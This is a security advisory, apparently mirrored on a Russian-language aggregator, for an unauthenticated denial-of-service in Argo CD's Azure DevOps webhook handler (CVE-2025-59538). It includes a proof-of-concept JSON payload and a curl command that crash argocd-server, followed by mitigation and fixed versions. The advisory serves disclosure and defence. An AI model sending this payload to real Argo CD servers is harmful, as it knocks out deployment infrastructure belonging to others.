GHSA-gpx4-37g2-c8pv

Опубликовано: 30 сент. 2025

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

Summary

In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.

The slice index [0] is accessed without a length check, causing an index-out-of-range panic.

A single unauthenticated HTTP POST is enough to kill the process.

Details

case azuredevops.GitPushEvent: // util/webhook/webhook.go -- line ≈147 revision = ParseRevision(payload.Resource.RefUpdates[0].Name) // panics if slice empty change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID) change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID) touchedHead = payload.Resource.RefUpdates[0].Name == payload.Resource.Repository.DefaultBranch

If the attacker supplies "refUpdates": [], the slice has length 0.

The webhook code has no recover(), so the panic terminates the entire binary.

PoC

payload-azure-empty.json:

{ "eventType": "git.push", "resource": { "refUpdates": [], "repository": { "remoteUrl": "https://example.com/dummy", "defaultBranch": "refs/heads/master" } } }

curl call:

curl -k -X POST https://argocd.example.com/api/webhook \ -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \ -H 'Content-Type: application/json' \ --data-binary @payload-azure-empty.json

Observed crash:

panic: runtime error: index out of range [0] with length 0 goroutine 205 [running]: github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo webhook.go:147 +0x1ea5 ...

Mitigation

If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.

apiVersion: v1 kind: Secret metadata: name: argocd-secret type: Opaque data: + webhook.azuredevops.username: <your base64-encoded secret here> + webhook.azuredevops.password: <your base64-encoded secret here>

For more information

Open an issue in the Argo CD issue tracker or discussions
Join us on Slack in channel #argo-cd

Credits

Discovered by Jakub Ciolek at AlphaSense.

Ссылки

Пакеты

Наименование

github.com/argoproj/argo-cd/v2

Затронутые версииВерсия исправления

>= 2.9.0-rc1, <= 2.14.19

2.14.20

Наименование

github.com/argoproj/argo-cd/v3

Затронутые версииВерсия исправления

= 3.2.0-rc1

3.2.0-rc2

Наименование

github.com/argoproj/argo-cd/v3

Затронутые версииВерсия исправления

>= 3.1.0-rc1, <= 3.1.7

3.1.8

Наименование

github.com/argoproj/argo-cd/v3

Затронутые версииВерсия исправления

>= 3.0.0-rc1, <= 3.0.18

3.0.19

EPSS

Процентиль: 29%

0.00105

Низкий

7.5 High

CVSS3

CVE ID

CVE-2025-59538

Дефекты

CWE-248

CWE-703

Связанные уязвимости

CVE-2025-59538

CVSS3: 7.5

nvd

4 месяца назад

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.

EPSS

Процентиль: 29%

0.00105

Низкий

7.5 High

CVSS3

CVE ID

CVE-2025-59538

Дефекты

CWE-248

CWE-703